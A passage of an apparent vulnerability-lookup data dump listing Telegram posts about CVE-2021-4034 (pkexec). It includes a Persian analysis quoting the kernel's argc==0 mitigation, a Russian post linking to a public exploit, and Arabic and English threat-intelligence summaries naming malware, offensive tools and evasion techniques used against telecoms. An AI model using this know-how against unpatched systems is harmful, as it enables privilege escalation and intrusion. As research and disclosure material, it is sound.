\u06a9\u0647 \u0627\u0633\u0645 \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0631 \u0622\u0646 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f \u0648 \u0637\u0628\u0642 \u0645\u062f\u0644 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0628\u0627\u06cc\u062f NULL \u0645\u06cc\u200c\u0628\u0648\u062f \u0628\u0631\u0627\u0628\u0631 \u201c\u201d \u0634\u062f\u0647 \u0628\u0648\u062f. \u0645\u0648\u0631\u062f \u062f\u0648\u0645\u06cc \u06a9\u0647 \u0639\u062c\u06cc\u0628 \u0628\u0648\u062f \u067e\u06cc\u0627\u0645 \u0632\u06cc\u0631 \u062f\u0631 dmesg \u0628\u0648\u062f.\nprocess 'exploit' launched 'pkexec' with NULL argv: empty string added\n\n\u0628\u0627 \u0631\u0633\u06cc\u062f\u0646 \u0628\u0647 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0628\u0647 \u0633\u0631\u0627\u063a Ubuntu 20.04 \u0631\u0641\u062a\u0645 \u0648 \u0647\u0645\u06cc\u0646 \u06a9\u062f \u0631\u0627 \u0628\u0631 \u0631\u0648\u06cc \u0622\u0646 \u0627\u062c\u0631\u0627 \u06a9\u0631\u062f\u0645 \u06a9\u0647 \u0647\u0645\u0647 \u0686\u06cc\u0632 \u0637\u0628\u0642 \u0627\u0646\u062a\u0638\u0627\u0631 \u0631\u062e \u062f\u0627\u062f\u0647 \u0648 \u062f\u0631 gdb \u0628\u0627 \u0631\u0633\u06cc\u062f\u0646 \u0628\u0647 main \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc pkexec \u0645\u0642\u062f\u0627\u0631 argc==0 \u0628\u0631\u0642\u0631\u0627\u0631 \u0628\u0648\u062f\u0647 \u0648 \u0627\u0645\u06a9\u0627\u0646 \u062a\u0633\u062a CVE \u0648\u062c\u0648\u062f \u062f\u0627\u0634\u062a. \u0627\u06cc\u0646\u062c\u0627 \u0648\u0627\u0636\u062d \u0628\u0648\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0631\u0646\u0644\u200c\u0647\u0627\u06cc \u062c\u062f\u06cc\u062f \u0644\u06cc\u0646\u0648\u06a9\u0633 \u062f\u0631 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0633\u06cc\u0633\u062a\u0645\u06cc execve \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u06cc \u0627\u0639\u0645\u0627\u0644 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u062c\u0644\u0648\u06cc \u0627\u062c\u0631\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0627 argc==0 \u06af\u0631\u0641\u062a\u0647 \u0634\u0648\u062f. \u0627\u06cc\u0646\u062c\u0627 \u062f\u06cc\u06af\u0647 \u0644\u0627\u0632\u0645 \u0628\u0648\u062f \u06a9\u062f \u06a9\u0631\u0646\u0644 \u0686\u06a9 \u0634\u0648\u062f!\n\n\u0628\u0627 \u0631\u0641\u062a\u0646 \u0628\u0647 github\u200c \u0648 \u0628\u0631\u0631\u0633\u06cc \u0641\u0627\u06cc\u0644 fs/exec.c \u06a9\u0631\u0646\u0644 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0645\u0634\u0627\u0647\u062f\u0647 \u0634\u062f \u06a9\u0647 \u062f\u0631 \u062a\u0627\u0628\u0639 \u0627\u062c\u0631\u0627\u06cc \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0633\u06cc\u0633\u062a\u0645\u06cc execve \u06a9\u062f \u0632\u06cc\u0631 \u062f\u0631 March 2022 \u0627\u0636\u0627\u0641\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u062c\u0644\u0648\u06cc \u0627\u062c\u0631\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0627 argc==0 \u0631\u0627 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.\n\n/*\n * When argv is empty, add an empty string (\"\") as argv[0] to\n * ensure confused userspace programs that start processing\n* from argv[1] won't end up walking envp. See also\n* bprm_stack_limits().\n*/\nif (bprm->argc == 0) {\n retval = copy_string_kernel(\"\", bprm);\n if (retval < 0)\n goto out_free;\n bprm->argc = 1;\n}\n\n\u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646 \u0628\u0647 \u0628\u0639\u062f \u0639\u0644\u0627\u0648\u0647 \u0628\u0631 OpenBSD \u0628\u0631 \u0631\u0648\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0646\u06cc\u0632 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0627\u06cc\u0646 \u0645\u062f\u0644\u06cc \u0648\u062c\u0648\u062f \u0646\u062e\u0648\u0627\u0647\u062f \u062f\u0627\u0634\u062a! :-D\n\u067e.\u0646: \u062f\u0631 \u0622\u06cc\u0646\u062f\u0647\u200c \u06cc\u06a9 \u0648\u06cc\u062f\u0626\u0648 \u0627\u0632 \u0634\u06cc\u0648\u0647\u200c\u06cc \u06a9\u0627\u0645\u0644 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 CVE \u0645\u0646\u062a\u0634\u0631 \u0645\u06cc\u200c\u06a9\u0646\u0645.\n\n#linux #kernel #CVE #PolKit #pkexec #execve", "creation_timestamp": "2024-05-17T16:26:16.000000Z"}, {"uuid": "5dc36799-2443-4ca0-a402-ff0e3e274436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/-AMVnSY6jDOojlnXSGqNnso0CPT7pe-b2HhnSTUmCsNWYZA", "content": "", "creation_timestamp": "2025-10-01T15:00:08.000000Z"}, {"uuid": "e97bba3e-d6f4-4a97-82a8-af0ffafb9a6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/SpiderCodeCommunity1/368", "content": "\u0633\u0645\u0639\u062a \u0639\u0646 \u062a\u062c\u0633\u0633 \u0627\u0644\u062e\u0641\u064a \u0641\u064a \u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0642\u0627\u0631\u0647 \u0627\u0633\u064a\u0627 \u061f\u061f\n\n\n\u0627\u0647\u0644\u0627 \u0648\u0633\u0647\u0644\u0627 \u0628\u064a\u0643 \u064a\u0639\u0632\u064a\u0632\u064a \u0641\u064a \u0645\u0642\u0627\u0644 \u062c\u062f\u064a\u062f \ud83d\ude01 \n\n\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0645\u0642\u0627\u0644 :\n\n( \u0627\u062e\u062a\u0631\u0627\u0642 \u0634\u0628\u0643\u0627\u062a \u0627\u062a\u0635\u0627\u0644 \u0644\u064a \u0642\u0627\u0631\u0647 \u0627\u0633\u064a\u0627 )\n\n\n\u0641\u064a \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0623\u062e\u0637\u0631 \u0627\u0644\u062d\u0645\u0644\u0627\u062a \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0643\u0634\u0641 \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 \u0628\u0644\u063a\u062a \u0634\u0631\u0643\u0647 \n\n( Palo Alto Networks - Unit 42 )\n\n\n\u0639\u0646 \u0646\u0634\u0627\u0637 \u0645\u0643\u062b\u0641 \u0644\u0645\u062c\u0645\u0648\u0639\u0629 \u062a\u0647\u062f\u064a\u062f \u0645\u062a\u0642\u062f\u0645\u0629 \u062a\u0639\u0631\u0641 \u0628\u0627\u0633\u0645 CL-STA-0969 \u0642\u062f\u0631\u062a \u0627\u0646\u0647 \u062a\u0633\u062a\u0647\u062f\u0641 \u062e\u0644\u0627\u0644 \u0639\u0634\u0631 \u0627\u0634\u0647\u0631 \u0643\u0627\u0645\u0644\u0647 \u0627\u0644\u0628\u0646\u064a\u0647 \u0627\u0644\u062a\u062d\u062a\u064a\u0647 \u0627\u0644\u062d\u064a\u0648\u064a\u0647 \u0644\u064a \u062c\u0646\u0648\u0628 \u0634\u0631\u0642 \u0627\u0633\u064a\u0627 \n\n\u0648 \u064a\u0639\u062a\u0642\u062f \u0627\u0646 \u0627\u0644\u062a\u062c\u0633\u0633 \u062f\u0627 \u0645\u0646 \u0639\u0646 \u0637\u0631\u064a\u0642 \u062f\u0648\u0644 \ud83d\udd75\ud83c\udffb\n\n\n\u0637\u064a\u0628 \u064a\u0627 \u0633\u0628\u0627\u064a\u062f\u0631 \u062f\u0648\u0644 \u0647\u062f\u0641\u0647\u0645 \u0627\u064a \u061f\n\n\n\u0647\u062f\u0641\u0647\u0645 \u0627\u062e\u062a\u0631\u0627\u0642 \u0634\u0628\u0643\u0627\u062a \u0627\u0644\u0627\u062a\u0635\u0627\u0644\u0627\u062a \u062f\u0648\u0646 \u0627\u064a \u0639\u0644\u0645 \u0644\u064a \u0627\u064a \u0634\u062e\u0635 ( \u0633\u0631\u064a\u0647 \u062a\u0627\u0645\u0647 )\n\n\n\n\u0627\u0644\u062a\u062d\u0642\u064a\u0642\u0627\u062a \u0627\u0638\u0647\u0631\u062a \u0627\u0646 \u0627\u0644\u0647\u062c\u0648\u0645 \u0643\u0627\u0646 \u0645\u0646 \u0641\u0628\u0631\u0627\u064a\u0631 \u0644\u062d\u062f \u0646\u0648\u0641\u0645\u0628\u0631 2024 \u0648 \u0643\u0627\u0646 \u0627\u0644\u0647\u062f\u0641 \u0644\u0627\u0633\u0627\u0633\u064a \u0645\u0646 \u062f\u0627 \u0639\u0645\u0644 rce \u0645\u0646 \u063a\u064a\u0631 \u0644\u0627\u062d\u062a\u064a\u0627\u062c\u0627\u062a \u0644\u064a \u062a\u0641\u0627\u0639\u0644 \u0639\u0634\u0627\u0646 \u0633\u0631\u0642\u0647 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \n\n\n\u0644\u062d\u0638\u0647 \u0628\u0633 \u0627\u064a \u0647\u0648\u0627 rce \u061f\n\n\u0628\u062e\u062a\u0635\u0627\u0631 rce \u0647\u064a\u0627 \u0647\u062c\u0645\u0647 \u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0647 \u0647\u062f\u0641\u0647 \u0627\u0646\u0647 \u062a\u0639\u0645\u0644 \u0627\u062e\u062a\u0631\u0627\u0642 \u0648 \u062a\u062d\u0643\u0645 \u0641\u064a shell \u0644\u064a \u0627\u0644\u0636\u062d\u064a\u0647 \u0648 \u062f\u064a \u0645\u0646 \u0627\u062e\u0637\u0631 \u0647\u062c\u0645\u0627\u062a \u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0647\n\n\n\u0637\u064a\u0628 \u0627\u0634\u0631\u062d \u0644\u064a\u0646\u0627 \u0645\u062b\u0627\u0644 \u0639\u0646 \u0647\u062c\u0648\u0645 \u061f\n\n\n\u0647\u0645\u0627 \u0627\u0633\u062a\u062e\u062f\u0645\u0648 \u0627\u062f\u0647 \u0627\u0633\u0645\u0647 \n\n( Cordscan )\n\n\u0628\u062d\u064a\u062b \u0627\u0646\u0647\u0645 \u064a\u062c\u0645\u0648\u0639 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0639\u0646 \u0644\u0627\u062c\u0647\u0627\u0632\u0647 \u0648 \u0644\u062d\u062f \u0648\u0642\u062a\u0646\u0627 \u0647\u0630\u0627 \u0645\u062d\u062f\u0634 \u0644\u0642\u064a \u062f\u0644\u064a\u0644\n\n\u0648 \u0628\u0639\u062f\u0647\u0627 \u0639\u0645\u0644\u0648 brute-force \u0639\u0644\u0649 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SSH\n\n\u0648 \u0628\u0639\u062f\u0647\u0627 \u062f\u062e\u0644\u0648 \u0641\u064a ssh \u0648 \u0632\u0631\u0639\u0648\u0627 malware \n\n\nAuthDoor : \u0648\u062d\u062f\u0629 \u0645\u0635\u0627\u062f\u0642\u0629 \u062e\u0628\u064a\u062b\u0629 \u062a\u0642\u0648\u0645 \u0628\u0633\u0631\u0642\u0629 \u0643\u0644\u0645\u0627\u062a \u0627\u0644\u0645\u0631\u0648\u0631 \u0648\u062a\u0648\u0641\u0631 \u0648\u0635\u0648\u0644 \u062f\u0627\u0626\u0645 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \"\u0643\u0644\u0645\u0629 \u0645\u0631\u0648\u0631 \u0633\u062d\u0631\u064a\u0629\".\n\nCordscan : \u0623\u062f\u0627\u0629 \u0644\u0641\u062d\u0635 \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0627\u0644\u062a\u0642\u0627\u0637 \u0627\u0644\u062d\u0632\u0645.\n\nGTPDOOR: \u0645\u0635\u0645\u0645\u0629 \u062e\u0635\u064a\u0635\u064b\u0627 \u0644\u0634\u0628\u0643\u0627\u062a \u0627\u0644\u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0627\u0644\u0642\u0631\u064a\u0628\u0629 \u0645\u0646 \u062a\u0628\u0627\u062f\u0644 \u062a\u062c\u0648\u0627\u0644 GPRS.\n\nEchoBackdoor: \u0628\u0627\u0628 \u062e\u0644\u0641\u064a \u0633\u0644\u0628\u064a \u064a\u0633\u062a\u062e\u062f\u0645 \u062d\u0632\u0645 ICMP \u0644\u062a\u0644\u0642\u064a \u0648\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0648\u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0646\u062a\u0627\u0626\u062c.\n\nSGSN Emulator (sgsnemu) : \u0644\u062a\u062c\u0627\u0648\u0632 \u0627\u0644\u062c\u062f\u0631\u0627\u0646 \u0627\u0644\u0646\u0627\u0631\u064a\u0629 \u0639\u0628\u0631 \u0627\u0644\u062a\u0644\u0627\u0639\u0628 \u0628\u0627\u0644\u0634\u0628\u0643\u0629.\n\nChronosRAT : \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629 \u0642\u0627\u062f\u0631\u0629 \u0639\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u0634\u0644 \u0643\u0648\u062f\u060c \u0623\u062e\u0630 \u0644\u0642\u0637\u0627\u062a \u0634\u0627\u0634\u0629\u060c \u062a\u0633\u062c\u064a\u0644 \u0636\u063a\u0637\u0627\u062a \u0627\u0644\u0645\u0641\u0627\u062a\u064a\u062d\u060c \u0625\u0644\u062e.\n\nNoDepDNS (MyDns) : \u0628\u0627\u0628 \u062e\u0644\u0641\u064a \u0628\u0644\u063a\u0629 Go \u064a\u062a\u0644\u0642\u0649 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0639\u0628\u0631 DNS \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0648\u062a UDP \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0641\u0630 53.\n\n\n\u0648 \u0627\u062e\u062a\u0631\u0642\u0648 \u0643\u0630\u0627 \u0645\u062c\u0645\u0648\u0639\u0647 \u0632\u064a :\n\nLightBasin (UNC1945): \u062a\u0633\u062a\u0647\u062f\u0641 \u0642\u0637\u0627\u0639 \u0627\u0644\u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0645\u0646\u0630 2016.\n\nUNC2891: \u0645\u062c\u0645\u0648\u0639\u0629 \u0645\u0627\u0644\u064a\u0629 \u0647\u0627\u062c\u0645\u062a \u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0635\u0631\u0627\u0641 \u0627\u0644\u0622\u0644\u064a.\n\nUNC3886: \u0645\u062c\u0645\u0648\u0639\u0629 \u0627\u0633\u062a\u063a\u0644\u062a \u062b\u063a\u0631\u0627\u062a \u0641\u064a VMware.\n\n\nMicrosocks Proxy\n\nFRP (Fast Reverse Proxy)\n\nFScan\n\nResponder\n\nProxyChains\n\n\u0648 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0644\u064a cves \u0632\u064a :\n\nCVE-2016-5195\n\nCVE-2021-4034\n\nCVE-2021-3156\n\n\u0648 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0643\u0646\u064a\u0643\u0627\u062a \u0644\u064a \u062a\u062e\u0641\u064a \u0632\u064a :\n\n\u0627\u0644\u062a\u0644\u0627\u0639\u0628 \u0628\u062d\u0631\u0643\u0629 \u0627\u0644\u0645\u0631\u0648\u0631 \u0639\u0628\u0631 DNS tunneling\n\n\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u0634\u063a\u0644\u064a \u0627\u0644\u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0627\u0644\u0645\u062e\u062a\u0631\u0642\u064a\u0646 \u0643\u0646\u0642\u0627\u0637 \u0648\u0633\u064a\u0637\u0629\n\n\u0645\u0633\u062d \u0633\u062c\u0644\u0627\u062a \u0627\u0644\u0645\u0635\u0627\u062f\u0642\u0629\n\n\u062a\u0639\u0637\u064a\u0644 SELinux\n\n\u062a\u063a\u064a\u064a\u0631 \u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u0639\u0645\u0644\u064a\u0627\u062a \u0644\u062a\u0628\u062f\u0648 \u0634\u0631\u0639\u064a\u0629 \u062f\u0627\u062e\u0644 \u0627\u0644\u0646\u0638\u0627\u0645\n\n\n\u0648 \u0643\u0627\u0646 \u0641\u064a \u0631\u062f \u0641\u0639\u0644 \u0627\u0644\u062f\u0648\u0644 \u0632\u064a \u0627\u0644\u0635\u064a\u0646 \u0648 \u0627\u0645\u0631\u064a\u0643\u0627 \n\n\n\u062d\u064a\u0646 \u0633\u0627\u0626\u0644 \u0627\u0644\u0631\u0626\u064a\u0633 \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a \u062f\u0648\u0646\u0627\u0644\u062f \u062a\u0631\u0627\u0645\u0628 \u0639\u0644\u0649 \u0642\u0646\u0627\u0629 \u0641\u0648\u0643\u0633 \u0646\u064a\u0648\u0632 \u0639\u0646 \u0647\u062c\u0645\u0627\u062a \u0635\u064a\u0646\u064a\u0629 \u0639\u0644\u0649 \u0646\u0638\u0645 \u0627\u0644\u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a\u0629 \u0648\u0633\u0631\u0642\u0629 \u0627\u0644\u0645\u0644\u0643\u064a\u0629 \u0627\u0644\u0641\u0643\u0631\u064a\u0629 \u0642\u0627\u0644 :\n\n\u0647\u0648 \u0623\u0646\u062a \u0645\u062a\u062e\u064a\u0644 \u0627\u0646\u0646\u0627 \u0645\u0634 \u0628\u0646\u0639\u0645\u0644 \u0643\u062f\u0647 \u061f\u061f\u061f\n\n \u0627\u062d\u0646\u0627 \u0628\u0646\u0639\u0645\u0644 \u062d\u0627\u062c\u0627\u062a \u0643\u062a\u064a\u0631 \u0643\u062f\u0647 \u0627\u0644\u062f\u0646\u064a\u0627 \u0645\u0627\u0634\u064a\u0629 . \u0627\u0644\u0639\u0627\u0644\u0645 \u062f\u0647 \" \u0645\u0634 \u0633\u0647\u0644 \"\n\n\u0648\u0643\u0627\u0646 \u0627\u0644\u062d\u062f\u062b \u062f\u0627 \u062c\u0647 \u0645\u0639 \u0648\u0642\u062a \u0627\u0644\u064a \u0627\u0644\u0641\u0631\u064a\u0642 \u0627\u0644\u062a\u0642\u0646\u064a \u0627\u0644\u0635\u064a\u0646\u064a \u062d\u064a\u062b \u0642\u0627\u0644\u0648 \u0627\u0646 \u0627\u0644\u0635\u064a\u0646 \u0647\u064a\u0627 \u0627\u0644\u0633\u0628\u0628 \u0644\u0646\u0647\u0645 \u0642\u062f\u0631\u0648 \u064a\u0644\u0642\u0648 zero day \u0641\u064a \n\n( Microsoft Exchange )\n\n\n\u0648 \u0631\u0643\u0632 \u0641\u064a \u062f\u064a\n\n\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0623\u0643\u062b\u0631 \u0645\u0646 50 \u062c\u0647\u0627\u0632 \u0639\u0627\u0626\u062f\u064a\u0646 \u0644\u0643\u064a\u0627\u0646 \u0639\u0633\u0643\u0631\u064a \u0635\u064a\u0646\u064a \u0643\u0628\u064a\u0631 \u0628\u064a\u0646 \u064a\u0648\u0644\u064a\u0648 2022 \u0648\u064a\u0648\u0644\u064a\u0648 2023 \n\n\u0648\u0632\u0639\u0645\u062a \u0627\u0644\u0635\u064a\u0646 \u0623\u0646 \u0627\u0644\u0623\u0647\u062f\u0627\u0641 \u0634\u0645\u0644\u062a \u062c\u0627\u0645\u0639\u0627\u062a \u0648\u0645\u0624\u0633\u0633\u0627\u062a \u0628\u062d\u062b\u064a\u0629 \u0648\u0634\u0631\u0643\u0627\u062a \u062a\u0639\u0645\u0644 \u0641\u064a \u0645\u062c\u0627\u0644\u0627\u062a \u0627\u0644\u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0648\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a \u0627\u0644\u0641\u0636\u0627\u0626\u064a \n\n\u0648\u0642\u062f \u0627\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u062e\u062a\u0631\u0642\u0648\u0646 \u0627\u0644\u0623\u0645\u064a\u0631\u0643\u064a\u0648\u0646 \u062d\u0633\u0628 \u0632\u0639\u0645 \u0627\u0644\u0635\u064a\u0646 \u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a\u0629 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u064a\u0646 \u064a\u0648\u0644\u064a\u0648 \u0648\u0646\u0648\u0641\u0645\u0628\u0631 2024\n\n\n\n\u0627\u0643\u062a\u0628\u0648 \u0644\u064a\u0627 \u0631\u0627\u064a\u0643\u0645 \u0641\u064a \u0627\u0644\u0645\u0642\u0627\u0644 \u062d\u0627\u0648\u0644\u062a \u0627\u062e\u0644\u064a \u0644\u063a\u0647 \u0627\u0644\u0639\u0631\u0628\u064a\u0647 \u0627\u0644\u0641\u0635\u062d\u0647 \u0641\u064a \u0648 \u0634\u0643\u0631\u0627 \u0639\u0644\u064a \u0642\u0631\u0627\u0626\u0647 \u0627\u0644\u0645\u0642\u0627\u0644 \ud83e\udd0d\u2728\n\n\n\u0645\u0635\u062f\u0631 : \n\n\nhttps://thehackernews.com/2025/08/cl-sta-0969-installs-covert-malware-in.html", "creation_timestamp": "2025-08-03T10:22:58.000000Z"}, {"uuid": "6a1cc935-1c96-4b52-86c8-de28e1bce080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/poxek/573", "content": "\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 CVE-2021-4034 \u2014 github.com/berdav/CVE-2021-4034\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Debian \u0438 \u0447\u0430\u0441\u0442\u0438 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u043d\u0435\u0439 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432. \u041d\u0435\u0434\u043e\u0447\u0435\u0442 \u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 polkit-pkexec, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c setuid \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u044b\u0447\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u0440\u0435\u0434\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430\u043c\u0438.\n\n\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432\u0447\u0435\u0440\u0430 (25.01.2022), \u0447\u0430\u0441\u0442\u044c \u0444\u0438\u043a\u0441\u043e\u0432 \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u0430.", "creation_timestamp": "2022-01-26T12:40:55.000000Z"}, {"uuid": "1451d316-4431-44ae-9c6f-62d55ef41594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/SpiderCodeCommunity1/369", "content": "Title:\nCovert Espionage in Asia\u2019s Communication Networks\n\nHello and welcome, dear reader, to a new article \ud83d\ude01\n\nIn one of the most serious cyber espionage campaigns recently discovered, Palo Alto Networks \u2013 Unit 42 reported intense activity from an advanced threat group known as CL-STA-0969, which is believed to have targeted the critical telecommunications infrastructure of Southeast Asia over a span of ten months.\n\nIt is suspected that this operation was state-sponsored \ud83d\udd75\ud83c\udffb\n\n\n---\n\n\ud83e\udde0 So, what was their goal?\n\nTheir primary goal was to silently infiltrate and control telecom networks without detection \u2014 complete stealth.\n\nInvestigations revealed that the attacks occurred between February and November 2024, with the primary objective being Remote Code Execution (RCE) for data theft, without requiring user interaction.\n\n\n---\n\n\u26a0\ufe0f Wait \u2014 what is RCE?\n\nRCE (Remote Code Execution) is a cyberattack that allows an attacker to gain access to a system and execute commands remotely via a shell \u2014 one of the most dangerous forms of attack.\n\n\n---\n\n\ud83d\udd0d Example of the attack:\n\nThe attackers used a tool called Cordscan to gather intelligence about network devices.\nTo this day, no direct evidence has been found regarding their initial access point.\n\nThen, they performed brute-force attacks on SSH protocols, eventually gaining access and planting multiple malware payloads:\n\nAuthDoor: A malicious authentication module that steals credentials and allows persistent access using a \"magic password.\"\n\nCordscan: A network scanning and packet capturing tool.\n\nGTPDOOR: Specifically built for telecom networks near GPRS roaming exchanges.\n\nEchoBackdoor: A passive backdoor using ICMP packets for command execution and result delivery.\n\nSGSN Emulator (sgsnemu): Bypasses firewalls through network manipulation.\n\nChronosRAT: Malware capable of executing shellcode, capturing screenshots, keylogging, and more.\n\nNoDepDNS (MyDns): A Go-based backdoor that receives commands over DNS using UDP on port 53.\n\n\n\n---\n\n\ud83c\udfaf Targeted Threat Groups:\n\nThey also interacted with or mimicked operations of other known APTs:\n\nLightBasin (UNC1945): Targeting telecom since 2016.\n\nUNC2891: Financially motivated, known for ATM attacks.\n\nUNC3886: Exploited vulnerabilities in VMware systems.\n\n\n\n---\n\n\ud83e\uddf0 Tools Used:\n\nMicrosocks Proxy\n\nFRP (Fast Reverse Proxy)\n\nFScan\n\nResponder\n\nProxyChains\n\n\n\n---\n\n\ud83d\udd13 CVEs Exploited:\n\nCVE-2016-5195\n\nCVE-2021-4034\n\nCVE-2021-3156\n\n\n\n---\n\n\ud83d\udd75\ufe0f\u200d\u2642\ufe0f Stealth Techniques:\n\nDNS tunneling for traffic obfuscation\n\nUsing compromised telecom infrastructure as intermediate relays\n\nLog tampering and credential wiping\n\nDisabling SELinux\n\nRenaming malicious processes to appear legitimate\n\n\n\n---\n\n\ud83c\udf0d International Response \u2013 China & USA\n\nWhen asked on Fox News about alleged Chinese cyberattacks on U.S. telecom infrastructure and intellectual property theft, former U.S. President Donald Trump responded:\n\n> \u201cYou really think we don\u2019t do that too?\nWe do a lot of things like that... the world isn\u2019t simple.\u201d\n\n\n\nThis controversy coincided with statements from a Chinese tech team claiming China was the victim, after discovering a Zero-Day vulnerability in Microsoft Exchange.\n\nThey further alleged that over 50 devices belonging to a major Chinese military entity were compromised between July 2022 and July 2023.\n\nThe Chinese claimed the targets included universities, research institutes, and satellite internet companies.\n\nAccording to their reports, U.S. hackers exploited electronic file system vulnerabilities to compromise the targets between July and November 